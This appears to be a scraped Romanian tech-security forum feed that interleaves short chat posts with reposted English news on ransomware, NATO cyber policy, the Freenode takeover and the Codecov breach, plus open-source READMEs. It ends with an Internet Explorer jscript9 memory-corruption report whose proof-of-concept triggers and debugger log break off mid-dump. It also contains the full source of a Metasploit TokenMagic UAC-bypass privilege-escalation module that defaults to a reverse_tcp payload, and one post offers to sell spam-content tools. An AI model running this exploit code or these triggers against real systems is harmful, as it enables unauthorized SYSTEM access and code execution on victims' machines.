Kev

Sau dupa ce se intoarce cineva de la lansare; Din preview-uri am observat ca este cat de cat ok, safe.

Salut Cateva pareri despre Microsoft Windows 11 Partea Security, Software compatibility... etc

Restore, daca au funcionat positbil sa isi fi facut update, incearca Restore sau Downgrade

@MrGrj

The age of ransomware raises questions over NATO's policies on state-sponsored cyberattacks and ransomware. Photo: bing.com NATO has updated its stance on what cyberattacks mean and what response is warranted. The North Atlantic Treaty Organization (NATO) – the 30-nation military alliance between North America and Europe – issued a new communique at this week's Brussels summit outlining how it should respond to national security threats. One of them is cyberattacks, as spotted by The Register. The new policy stance follows high-profile attacks on US fuel distribution network Colonial Pipeline – which paid $4 million to ransomware attackers, half of which was later seized by the FBI – and US meat packer JBS, which paid $11 million to ransomware attackers. The tech world is also still reeling from the SolarWinds hack, which compromised the West's top cybersecurity firms, and was attributed to the Russian government. And not so long ago, Russia was blamed for the massive NotPetya ransomware outbreak, while North Korea was blamed for 2017's WannaCry ransomware attack. In the wake of such attacks, NATO has endorsed its "Comprehensive Cyber Defence Policy", which will see the alliance treat cyberattacks on a "case-by-case basis" and may consider them the same as an armed attack. The NATO alliance committed to "impose costs on those who harm us" if it's deemed necessary. However, the policy of Western governments currently is in reality mostly limited to naming and shaming the country launching state-sponsored hacks. Joe Biden attended his first NATO meeting as US president and is set to meet with Russian president Vladimir Putin on Wednesday. Biden is expected to demand Russia does more to tackle cybercrime within its jurisdiction. The Colonial attack was blamed on a Russian-based ransomware-as-a-service operation. China was also in the spotlight at the NATO summit for its cyber capabilities, disinformation campaigns and expansion of power across the globe. Via zdnet.com

Salut, exista telefoane trial sim+ (3,4,5...sim-uri)? Daca nu Samsung, Alcatel, sau Nokia, ar fi ok si made in Tokio

Merita, mi-a aruncat mama un Spectrum, un 686 (cred...), un nintendo, ulterior aflu ca sunt la expozitie un Russia +999 casete, am cautat pe olx, ma doare capul ce preturi au

De unde ai statisticile? Am pe cineva vinde tot ce tine de GSA content uniq generator Revin cu pret dupa ce imi raspunda, in caz ca esti interesat

Mananci prune @Vlachs Benny mai traiti? ON: te indexeaz\a rapid daca ai vechime, in caz de esti flamand nu ai nicio sansa

Opinia mea: cyberattack -> U.S.A <-> Russia = China

Spot is the virtual hub for your organization– bringing the spirit and utility of being in the same physical office to a digital experience. Instantly create an always-on virtual space for your organization. Naturally move between rooms and conversations. Reduce team friction and increase engagement. Try now for free! Source

FBI Director Christopher Wray speaks during a Senate Select Committee on Intelligence hearing about worldwide threats, on Capitol Hill in Washington, DC, U.S., April 14, 2021. Graeme Jennings/Pool via REUTERS/Files FBI Director Christopher Wray told the Wall Street Journal that the agency is investigating about 100 different types of ransomware, many of which trace back to actors in Russia. In the interview published on Friday, Wray singled out Russia as harboring many of the known users of ransomware. Each of the 100 different malicious software variants are responsible for multiple ransomware attacks in the United States, Wray told the newspaper. The Kremlin on Friday said the FBI director's remark that Russia was a haven for hackers was "emotional", RIA reported. Wray's remarks come days after a cyberattack disrupted much of meatpacker JBS SA's (JBSS3.SA) North American and Australian operations. The White House linked the attack to a Russia-based group. read more Last month, the biggest U.S. gasoline pipeline Colonial Pipeline, was hit by a ransomware cyberattack, which crippled fuel delivery for several days in the U.S. Southeast. The FBI attributed the cyberattack to a group believed to be based in Russia or Eastern Europe. read more The U.S. Department of Justice is elevating investigations of ransomware attacks to a similar priority as terrorism, a senior department official told Reuters on Thursday. Ransom software works by encrypting victims' data; typically hackers will offer the victim a key in return for cryptocurrency payments that can run into the hundreds of thousands or even millions of dollars. Via reuters.com

dupa noa ani nu ati auzit nici acum de Caller ID Spoofing

Documentation: https://cs01.github.io/termpair Source Code: https://github.com/cs01/termpair Try It: https://grassfedcode.com/termpair What is TermPair? TermPair lets developers securely share and control terminals in real time. Usage Start the TermPair server, or use the one already running at https://grassfedcode.com/termpair. >> termpair serve INFO: Started server process [15455] INFO: Waiting for application startup. INFO: Application startup complete. INFO: Uvicorn running on http://localhost:8000 (Press CTRL+C to quit) INFO: ('127.0.0.1', 35470) - "WebSocket /connect_to_terminal" [accepted] Then share your terminal by running: >> termpair share --port 8000 -------------------------------------------------------------------------------- Running '/bin/bash' and sharing to 'http://localhost:8000/?terminal_id=b26903e19ffff2bc9ace60491e8200d5'. Type 'exit' or close terminal to stop sharing. -------------------------------------------------------------------------------- You can share that URL with whoever you want. Note that anyone that has it can view and possibly control your terminal. The server multicasts terminal output to all browsers that connect to the session. Security Termpair uses AES-GCM 128 bit end-to-end encryption for all terminal input and output. How it Works Before termpair sends terminal output to the server, it encrypts it using a secret key so the server cannot read it. The server forwards that data to connected browsers. When the browsers receive the data, they use the secret key to decrypt and display the terminal output. Likewise, when a browser sends input to the terminal, it is encrypted in the browser, forwarded from the server to the terminal, then decrypted in the terminal by termpair and written to the terminal's input. The secret key is generated by termpair and embedded in a part of the url that is not sent to the server. Run With Latest Version Use pipx to run the latest version without installing: Serve: >> pipx run termpair serve Then share: >> pipx run termpair share -b # -b flag opens the browser automatically Installation You can install using pipx or pip: >> pipx install termpair or >> pip install termpair API To view the command line API reference, run: >> termpair --help System Requirements Python: 3.6+ Operating System: To view/control from the browser: All operating systems are supported. To run the server, termpair serve: Tested on Linux. Should work on macOS. Might work on Windows. To share your terminal, termpair share: Tested on Linux. Should work on macOS. Probably doesn't work on Windows. Download termpair-master.zip or git clone https://github.com/cs01/termpair.git Source

eu le-as numi drone, iar unul dintre primele proiecte a fost a lui Aurel Vlaicu care nu a fost finalizat din motivul asasinarii lui

Freenode IRC staff resign en masse after takeover by Korea’s “crown prince” Former staffer alleges "a hostile entity is now in control... and has your data." Freenode currently ranges between roughly 75,000 and 90,000 users—that's a far cry from the 240,000 users fellow IRC network QuakeNet had back in 2005, but it's still quite a lot of people. Freenode has been the world's largest IRC network since 2013, with roughly three times as many users as its closest competitor, IRCnet. Last week, the massive IRC network was taken over by tech entrepreneur and "Korean Crown Prince" Andrew Lee—a move that the network's staff has apparently unanimously classified as a "hostile takeover," although Lee himself claims these are only "rumors" and "simply untrue." At first blush, it's tempting for an outside observer—someone who isn't already familiar with the history of the network's ownership and management—to shrug and say "well, who knows." Lee lays out several hundred words of explanation in a blog post currently featured on Freenode's front page—most of which sounds reasonable. But the one question Lee never addresses—let alone answers—is why at least 14 separate staff members would quit en masse, all disagreeing with the story he tells. A dubious contract In 2017, Christel Dahlskjaer—who was, at the time, head of Freenode staff—created a corporation, Freenode Ltd., which she immediately sold to Lee. Dahlskjaer and Lee told Freenode staff and users that the incorporation was only done as necessary paperwork in order to sponsor a conference and that day-to-day operations would remain unchanged. Contract or no contract, staff and developers of Freenode maintain that it wasn't actually possible to sell the network—the staff is all volunteers, and the infrastructure itself wasn't owned by Dahlskjaer in the first place. According to resigning Freenode developer Aaron Jones, however, "Andrew has more money than us, and so we cannot fight this." Although the contract in question was signed in 2017, staffers didn't begin objecting until this year, when operational changes began appearing without their control or consent. A unilateral decision on advertising In February 2021, Dahlskjaer placed the logo for Shells—a Lee-owned company offering cloud-based virtual desktops—prominently on Freenode's front page. By itself, this might seem innocuous—FOSS projects accept sponsorships and advertising all the time. But staffers, who were supposedly still in control of the network, weren't consulted about the arrangement—and they did not approve. One reason for staffers' virulent disapproval is Shells CTO Mark Karpelès. Karpelès is the founder of the defunct Mt. Gox bitcoin exchange, which lost nearly 850,000 bitcoin (currently worth a staggering $33.4 billion-with-a-B US dollars) to attackers who exploited a massive security flaw. Karpelès was found guilty in a Tokyo court of deliberately tampering with records to cover up the exchange's various losses, although he was found innocent of outright embezzlement. As former staffer Aaron Jones explains in his lengthy letter of resignation—which links to similar announcements from other departing high-profile staffers—this wasn't the only issue with the new ad. According to Jones, sponsorships are normally only found at freenode.net/acknowledgements—making the prominent Shells logo in the upper right of Freenode's front page more of a departure from the norm than it might seem. Jones goes on to say that Dahlskjaer was either unable or unwilling to explain the sudden new ad to staffers, choosing to resign instead. (Lee claims that Freenode staff "harassed" Dahlskjaer into resignation; Jones and other departing staffers deny this characterization.) Freenode staff elected Tom Wesley (aka tomaw) to replace her. Escalation in April Beginning in April 2021, Lee's exercise of control continued ramping up: Staffers created a blog post outlining changes in leadership and announcing a change to newly developed back-end ircd software Solanum. According to Jones, Lee summarily removed the post—and manually edited the website's built-in history to create the impression that it had never existed. Later in April, a Freenode test network—in use to get ready for the infrastructure shift to Solanum—was shut down without discussion. Wesley (tomaw) performed the shutdown and refused to say why; Jones and others believe Lee was behind the shutdown, used threat of legal force to make Wesley comply, and issued related gag orders to OFTC staff. Lee registered the channel #freenode-board without discussing it with staff—and, according to Jones, without proper authority (since only official group contacts are allowed to create channels in Freenode's primary namespace, and Lee was not an official Freenode contact). Shane Allen (aka nirvana), an associate and employee of Lee's, bragged about "turning" tomaw, and he attempted to bribe prominent user Ariadne with promises of ops privileges, saying, "I'll make sure you get +o0 in #freenode so you can kick people. My gift to you pal." On May 11, Lee began issuing notices to staff as a group and directly to individual Freenode staffers. Everything came from "the board"—an entity that staffers say never existed, and even now is merely a euphemism for Lee himself. On May 12, Lee (aka rasengan) posted his version of events—in which he claims legal ownership of Freenode, along with a list of grievances—in a Github gist. (The gist is considerably saltier than the version of events Lee posted to Freenode's public-facing blog a week later.) Libera Chat A week after Lee's effectively public announcement of ownership and de facto dictatorial operation of Freenode, the staffers who resigned from Freenode created Libera.chat as a replacement. Libera Chat is incorporated as a Swedish nonprofit organization, owned and operated by volunteer staffers who are voting members of the organization. It has a small, member-elected board—currently consisting of chair, treasurer, projects and community rep, engineering rep/vice chair, and operations rep. But most decisions are to be taken by the membership as a whole. The membership also elects two auditors, tasked with auditing the board's actions on behalf of the membership. A transparency report is to be published annually, detailing bookkeeping and the auditors' findings along with the standard annual report from the board itself. All current Libera Chat boardmembers and auditors are Freenode staffers who resigned in protest of Lee's recent actions and assumption of control. Via arstechnica.com

Salut M-am indexat in toate motoarele: Bing , Google..etc cu un meta "free html/css template", am editat tot site-ul inclusiv (c) , de 4-5 zile este up cu acelasi tag. Ce pot face? Multumesc anticipat

^ off si eu :taie-i sa invete sa citeasca indianul on: interesanti parametrii oricum e fixed

macOCR is a command line app that enables you to turn any text on your screen into text on your clipboard. When you envoke the ocr command, a "screen capture" like cursor is shown. Any text within the bounds will be converted to text. You could invoke the app using the likes of Alfred.app, Hammerspoon, Quicksilver etc. An example Alfred.app workflow is available here. If you're still wondering "how does this work ?", I always find the .gif is the best way to clarify things: Installation Compile the code in this repo, or download a prebuilt binary (Apple Silicon, Intel) and put it on your path. Apple Silicon Install: curl -O https://files.littlebird.com.au/ocr.zip; unzip ocr.zip; sudo cp ocr /usr/local/bin; Intel Install: curl -O https://files.littlebird.com.au/ocr-EPiReQzFJ5Xw9wElWMqbiBayYLVp.zip; unzip ocr-EPiReQzFJ5Xw9wElWMqbiBayYLVp.zip; sudo cp ocr /usr/local/bin; When running the app the first time, you will likely be asked to allow the app access to your screen. OS Support This should run on Catalina and above. Who made this? macOCR was made by Marcus Schappi. I create software (and even hardware) to automate ecommerce, including: Chick Commerce. This free Australia Post app on Shopify. Script Ninja which enables you to create powerful scripts and tools to automate your Shopify store. Thoughts on Sherlocking? Apple, please sherlock this software! MIT License Copyright 2021 Marcus Schappi Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Download macOCR-master.zip or git clone https://github.com/schappim/macOCR.git Source

The plugin, installed on hundreds of thousands of sites, allows anyone to filch database info without having to be logged in. WP Statistics, a plugin installed on more than 600,000 WordPress websites, has an SQL-injection security vulnerability that could let site visitors make off with all kinds of sensitive information from web databases, including emails, credit-card data, passwords and more. WP Statistics, as its name suggests, is a plugin that delivers analytics for site owners, including how many people visit the site, where they’re coming from, what browsers and search engines they use, and which pages, categories and tags have the most visits. It also delivers anonymized data around IP addresses, referring sites, and country- and city-level details for visitors, all presented in the form of charts and graphs. Wordfence researchers found the high-severity bug (tracked as CVE-2021-24340, rating 7.5 out of 10 on the CVSS scale) in the “Pages” function, which lets administrators see which pages have received the most traffic. It returns this data using SQL queries to a back-end database – but it turns out that unauthenticated attackers can hijack the function to perform their own queries, in order to purloin sensitive information. The specific vulnerability is a time-based blind SQL injection, according to researchers at Wordfence. This technique involves sending requests to the database that “guess” at the content of a database table and instruct the database to delay the response or “sleep” if that guess is correct. For instance, an attacker could ask the database if the first letter of the admin user’s email address starts with the letter “A,” and instruct it to delay the response by five seconds if this is true. The only reliable method of preventing SQL injection is to prepare all SQL statements before executing them, researchers added. Prepared statements isolate each query parameter so that an adversary would not be able to see the entire scope of the data that’s returned. VeronaLabs, the plugin’s developer, has released a patch with version 13.0.8, so site administrators should update as quickly as possible. A similar bug was found earlier in May, which impacted the “Spam protection, AntiSpam, FireWall by CleanTalk” plugin, which is installed on more than 100,000 sites. It too allowed adversaries to use the time-based bling SQL approach, also without having to be logged on to mount an attack. Via threatpost.com

The CNA headquarters in Chicago. Photographer: AYNSLEY FLOYD/Bloomberg CNA Financial Corp., among the largest insurance companies in the U.S., paid $40 million in late March to regain control of its network after a ransomware attack, according to people with knowledge of the attack. The Chicago-based company paid the hackers about two weeks after a trove of company data was stolen, and CNA officials were locked out of their network, according to two people familiar with the attack who asked not to be named because they weren’t authorized to discuss the matter publicly. In a statement, a CNA spokesperson said the company followed the law. She said the company consulted and shared intelligence about the attack and the hacker’s identity with the FBI and the Treasury Department’s Office of Foreign Assets Control, which said last year that facilitating ransom payments to hackers could pose sanctions risks. In a security incident update published on May 12, CNA said it did “not believe that the systems of record, claims systems, or underwriting systems, where the majority of policyholder data – including policy terms and coverage limits – is stored, were impacted.” Ransomware attacks -- and particularly payments -- are rarely disclosed so it’s difficult to know what the biggest ransoms have been. The average payment in 2020 was $312,493, according to Palo Alto Networks, a 171% increase over the previous year. The $40 million payment is bigger than any previously disclosed payments to hackers, according to three people familiar with ransomware negotiations. The CNA hackers used malware called Phoenix Locker, a variant of ransomware dubbed ‘Hades.’ Hades was created by a Russian cybercrime syndicate known as Evil Corp., according to cybersecurity experts. Evil Corp. was sanctioned by the U.S. in 2019. However, attributing attacks can be difficult because hacking groups can share code or sell malware to one another. CNA, which offers cyber insurance, said its investigation concluded that the hackers were a group called Phoenix that isn’t subject to U.S. sanctions. Disclosure of the payment is likely to draw the ire of lawmakers and regulators already unhappy that U.S. companies are making large payouts to criminal hackers who over the last year have targeted hospitals, drug makers, police forces and other entities critical to public safety. The FBI discourages organizations from paying ransom because it encourages additional attacks and doesn’t guarantee data will be returned. Ransomware is a type of malware that encrypts a victim’s data. Cybercriminals using ransomware often steal the data too. The hackers then ask for a payment to unlock the files and promise not to leak stolen data. In recent years, hackers have been targeting victims with cyber insurance policies and huge volumes of sensitive consumer data that make them more likely to pay a ransom, according to cybersecurity experts. Last year was a banner year for ransomware groups, according to a task-force of security experts and law enforcement agencies which estimated that victims paid about $350 million in ransom last year, a 311% increase over 2019. The task force recommended 48 actions that the Biden administration and private sector could take to mitigate such attacks, including better regulation of the digital currency market used to make ransom payments. The report, prepared by the Institute for Security and Technology, was delivered to the White House days before Colonial Pipeline Co. was compromised in a ransomware attack that led to fuel shortages and long lines at gas stations along the East Coast of the U.S. Bloomberg reported that Colonial paid the hackers nearly $5 million shortly after the attack; Colonial Chief Executive Officer Joseph Blount, in an interview with the Wall Street Journal published on Wednesday, confirmed that the company paid the hackers -- $4.4 million in ransom. Colonial Pipeline Paid Hackers Nearly $5 Million in Ransom According to the two people familiar with the CNA attack, the company initially ignored the hackers’ demands while pursuing options to recover their files without engaging with the criminals. But within a week, the company decided to start negotiations with the hackers, who were demanding $60 million. Payment was made a week later, according to the people. Via bloomberg.com

WunderGraph Realtime Chat Example using NextJS, TypeScript & PostgreSQL Description This Example demonstrates how to build a production-grade Realtime Chat application by writing two GraphQL Queries. Features: Authentication Authorization Realtime Updates Cross Tab Login/Logout typesafe generated Typescript Client Prerequisites Make sure you have docker compose installed. Alternatively, you can use any PostgreSQL database available on localhost. Getting Started Install the dependencies and run the example: yarn global add @wundergraph/wunderctl@latest yarn yarn dev Questions? Read the Docs. Join us on Discord! Download: nextjs-typescript-postgresql-realtime-chat-main.zip or git clone https://github.com/wundergraph/nextjs-typescript-postgresql-realtime-chat.git Source

This Metasploit module leverages a UAC bypass (TokenMagic) in order to spawn a process/conduct a DLL hijacking attack to gain SYSTEM-level privileges. Windows 7 through Windows 10 1803 are affected. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE # Needed for generate_payload_dll include Msf::Exploit::FileDropper include Msf::Post::File include Msf::Post::Windows::FileSystem include Msf::Post::Windows::Powershell include Msf::Post::Windows::Priv include Msf::Post::Windows::ReflectiveDLLInjection prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Windows Privilege Escalation via TokenMagic (UAC Bypass)', 'Description' => %q{ This module leverages a UAC bypass (TokenMagic) in order to spawn a process/conduct a DLL hijacking attack to gain SYSTEM-level privileges. Windows 7 through Windows 10 1803 are affected. }, 'License' => MSF_LICENSE, 'Author' => [ 'James Forshaw', # Research 'Ruben Boonen (@FuzzySec)', # PoC 'bwatters-r7', # msf module 'jheysel-r7' # msf module ], 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => '2017-05-25', 'References' => [ ['URL', 'https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1'], ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html'], ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html'], ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html'] ], 'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ], 'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', 'WfsDelay' => 900 } ) ) register_options([ OptString.new('SERVICE_NAME', [false, 'Service Name to use (Random by default).', Rex::Text.rand_text_alpha(5..9)]), OptString.new('WRITABLE_DIR', [false, 'Directory to write file to (%TEMP% by default).', nil]), OptString.new('SERVICE_FILENAME', [false, 'Filename for Service Payload (Random by default).', Rex::Text.rand_text_alpha(5..9)]), OptEnum.new('METHOD', [ true, 'SERVICE or DLL, please select which attack method you would like to use (SERVICE by default). Note that the System Orchestrator service which loads the overwritten DLL when using the DLL method can take up to 10 minutes to trigger', 'SERVICE', ['SERVICE', 'DLL'] ]) ]) end def setup_process begin print_status('Launching notepad to host the exploit...') notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true) process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError # Sandboxes could not allow to create a new process # stdapi_sys_process_execute: Operation failed: Access is denied. print_error('Operation failed. Trying to elevate the current process...') process = client.sys.process.open end process end def inject_magic(process) if sysinfo['Architecture'] == ARCH_X64 library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x64.dll') elsif sysinfo['Architecture'] == ARCH_X86 library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'uso_trigger', 'uso_trigger.x86.dll') end library_path = ::File.expand_path(library_path) print_status("Reflectively injecting the trigger DLL into #{process.pid}...") dll = ::File.read(library_path) exploit_mem, offset = inject_dll_data_into_process(process, dll) print_good('Trigger injected.') payload_mem = inject_into_process(process, payload.encoded) print_good('Payload injected. Starting thread...') process.thread.create(exploit_mem + offset, payload_mem) end def launch_dll_trigger print_status('Trying to start notepad') process = setup_process inject_magic(process) print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') rescue Rex::Post::Meterpreter::RequestError => e elog(e) print_error(e.message) end def payload_arch payload.arch.include?(ARCH_X64) ? ARCH_X64 : ARCH_X86 end def exploit win_dir = session.sys.config.getenv('windir') cmd_path = "#{win_dir}\\system32\\cmd.exe" if datastore['SERVICE_FILENAME'] service_filename = datastore['SERVICE_FILENAME'] else service_filename = Rex::Text.rand_text_alpha(5..9) end service_filename = "#{service_filename}.exe" unless service_filename.end_with?('.exe') if datastore['SERVICE_NAME'] service_name = datastore['SERVICE_NAME'] else service_name = Rex::Text.rand_text_alpha(5..9) end if datastore['WRITABLE_DIR'] writable_dir = datastore['WRITABLE_DIR'] else writable_dir = session.sys.config.getenv('TEMP') end if datastore['METHOD'] =~ /DLL/i bin_path = "#{writable_dir}\\WindowsCoreDeviceInfo.dll" payload = generate_payload_dll vprint_status("Payload DLL is #{payload.length} bytes long") client.core.use('powershell') unless client.ext.aliases.include?('powershell') register_file_for_cleanup('C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up. # Replace Value in Generic Script. cmd_args = "/c move #{bin_path} C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll" else bin_path = "#{writable_dir}\\#{service_filename}" payload = generate_payload_exe_service({ servicename: service_name, arch: payload_arch }) vprint_status("Service Name = #{service_name}") client.core.use('powershell') unless client.ext.aliases.include?('powershell') # Replace Value in Generic Script. Note Windows 7 requires spaces after the equal signs in the below command. cmd_args = "/c sc create #{service_name} binPath= #{bin_path} type= own start= demand && sc start #{service_name}" end # Check target print_status('Checking Target') validate_active_host validate_payload # Upload the payload print_status("Uploading payload to #{bin_path}") write_file(bin_path, payload) register_file_for_cleanup(bin_path) # Read in Generic Script script = exploit_data('tokenmagic', 'tokenmagic.ps1') script.gsub!('_CMD_PATH_', cmd_path) script.gsub!('_CMD_ARGS_', cmd_args) # Run Exploit Script print_status("Running Exploit on #{sysinfo['Computer']}") begin print_status('Executing TokenMagic PowerShell script') session.powershell.execute_string({ code: script }) rescue Rex::TimeoutError => e elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e) print_error('Caught timeout. Exploit may be taking longer or it may have failed.') end if datastore['METHOD'] =~ /DLL/i launch_dll_trigger print_status("Note that the System Orchestrator service which loads the overwritten DLL when using the DLL method can take up to 10 minutes to trigger and recieve a shell.") end print_good('Enjoy the shell!') end def validate_active_host print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") rescue Rex::Post::Meterpreter::RequestError => e elog('Could not connect to session', error: e) raise Msf::Exploit::Failed, 'Could not connect to session' end def validate_payload vprint_status("Target Arch = #{sysinfo['Architecture']}") vprint_status("Payload Arch = #{payload.arch.first}") unless payload.arch.first == sysinfo['Architecture'] fail_with(Failure::NoTarget, 'Payload arch must match target arch') end end def check sysinfo_value = sysinfo['OS'] build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/) if build_num.nil? return CheckCode::Unknown("Couldn't retrieve the target's build number!") else vprint_status("Target's build number: #{build_num}") build_num = build_num[0].to_i end vprint_status("Build Number = #{build_num}") if datastore['METHOD'] =~ /service/i # Service method has been tested on Windows 7, 8 and 10 (1803 and ealier) return Exploit::CheckCode::Appears if (build_num >= 7600 && build_num <= 17134) elsif (sysinfo_value =~ /10/ && build_num >= 15063 && build_num <= 17134) # DLL method has been tested on Windows 10 (1703 to 1803) return Exploit::CheckCode::Appears elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7600 && build_num < 15063) print_error("The current target is not vulnerable to the DLL hijacking technique. Please try setting METHOD to 'SERVICE' and then try again!") end Exploit::CheckCode::Safe end end Source

Ireland's health services are still recovering from a ransomware attack, but hackers shouldn't expect their demands to be met. Rapid7 has disclosed the compromise of customer data and partial source code due to the Codecov supply chain attack. On Thursday, the cybersecurity firm said it was one of the victims of the incident, in which an attacker obtained access to the Codecov Bash uploader script. The cyberattack against Codecov took place on or around January 31, 2021, and was made public on April 15. The organization, which provides code coverage and testing tools, said that a threat actor tampered with the Bash uploader script, thereby compromising the Codecov-actions uploader for GitHub, Codecov CircleCl Orb, and the Codecov Bitrise Step. This enabled attackers to export data contained in user continuous integration (CI) environments. Hundreds of clients were potentially impacted, and now, Rapid7 has confirmed that the company was one of them. Rapid7 says the Bash uploader was used in a limited fashion as it was only set up on a single CI server used to test and build tooling internally for the Managed Detection and Response (MDR) service. As such, the attacker was kept away from product code, but they were able to access a "small subset of source code repositories" for MDR, internal credentials -- all of which have now been rotated -- and alert-related data for some MDR customers. Rapid7 has reached out to customers impacted by the data breach. The company pulled in cyberforensics assistance and following an investigation, has concluded that no other corporate systems or production environments were compromised. Codecov has since removed the unauthorized actor from its systems and is setting up monitoring and auditing tools to try and prevent another supply chain attack from occurring in the future. Impacted customers were notified via email addresses on record and through the Codecov app. Codecov recommends that users of the Bash uploaders between January 31, 2021, and April 1, 2021, who did not perform a checksum validation should re-roll their credentials out of caution. Via zdnet.com

There is a vulnerability in jscript9 that could be potentially used by an attacker to execute arbitrary code when viewing an attacker-controlled website in Internet Explorer. The vulnerability has been confirmed on Windows 10 64-bit with the latest security patches applied. Internet Explorer: Memory corruption in jscript9.dll related to scope of the arguments object There is a vulnerability in jscript9 that could be potentially used by an attacker to execute arbitrary code when viewing attacker-controlled website in Internet Explorer. The vulnerability has been confirmed on Windows 10 64-bit with the latest security patches applied. The following minimal sample is sufficient to trigger the bug: ############################################################ <!-- saved from url=(0014)about:internet --> <script> function main() { function v4(v5,v6) { with ({}) { arguments(); } } for(var i=0; i <1; i++) v4(1); } alert('start'); main(); alert('end'); </script> ############################################################ When this sample is opened with Internet Explorer, it crashes inside jscript9!Js::JavascriptFunction::CallFunction<1> when dereferencing memory pointed to by eax. jscript9!Js::JavascriptFunction::CallFunction<1>+0x39: 68c2d6e9 8bb850020000 mov edi,dword ptr [eax+250h] ds:002b:00000250=???????? On the first glance, it might look like a null pointer dereference, however the value of eax in this case was read from uninitialized memory. There are also different ways to trigger the crash when accessing the arguments object. The following sample demonstrates a crash when reading from a controllable address: ############################################################ <!-- saved from url=(0014)about:internet --> <script> function test() { test.caller.arguments.length = (0x13371337>>1); } function main() { function v4(v5,v6) { test(); with ({}) { arguments.length; arguments(); } } for(var i=0; i <1; i++) v4(1); } alert('start'); main(); alert('end'); </script> ############################################################ This sample crashes in Js::JavascriptOperators::GetProperty_Internal when dereferencing address 0x13371337+40h: jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35: 68b578b5 8b7840 mov edi,dword ptr [eax+40h] ds:002b:13371377=???????? The value read this way is used as a function pointer, thus demonstrating the vulnerability could be used for code execution. I haven't done the full root cause analysis (it will be easier to do with proper debug tooling for jscript9), but in both cases, the operations on 'arguments' object end up being performed on incorrect data. I suspect this is related to changing the scope, e.g. accessing an object at an incorrect stack slot due to scope change. Another possibility could be an incorrectly initialized arguments object or the corresponding local variable. Full debug log: ############################################################ (1654.14e8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=13371337 ebx=0910bbe0 ecx=0910bbe0 edx=0910bbe0 esi=092b8240 edi=00000000 eip=68b578b5 esp=053bc578 ebp=053bc590 iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35: 68b578b5 8b7840 mov edi,dword ptr [eax+40h] ds:002b:13371377=???????? 0:009> k # ChildEBP RetAddr 00 053bc590 68b69075 jscript9!Js::JavascriptOperators::GetProperty_Internal<0>+0x35 01 053bc5dc 68b9d19d jscript9!Js::InterpreterStackFrame::OP_ProfiledLdLen<Js::OpLayoutReg2_OneByte>+0x1f5 02 053bc608 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x7fd 03 053bc744 0b9a0fd9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242 WARNING: Frame IP not in any known module. Following frames may be wrong. 04 053bc750 68c2d743 0xb9a0fd9 05 053bc798 68b9ff61 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93 06 053bc7c8 68b9cb53 jscript9!Js::InterpreterStackFrame::OP_ProfiledCallI<Js::OpLayoutCallI_OneByte>+0x121 07 053bc7f8 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x1b3 08 053bc934 0b9a0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242 09 053bc940 68c2d743 0xb9a0fe1 0a 053bc988 68b9ff61 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93 0b 053bc9b8 68b9cb53 jscript9!Js::InterpreterStackFrame::OP_ProfiledCallI<Js::OpLayoutCallI_OneByte>+0x121 0c 053bc9e8 68b9c102 jscript9!Js::InterpreterStackFrame::Process+0x1b3 0d 053bcb14 0b9a0fe9 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x242 0e 053bcb20 68c2d743 0xb9a0fe9 0f 053bcb60 68b4eca9 jscript9!Js::JavascriptFunction::CallFunction<1>+0x93 10 053bcbd4 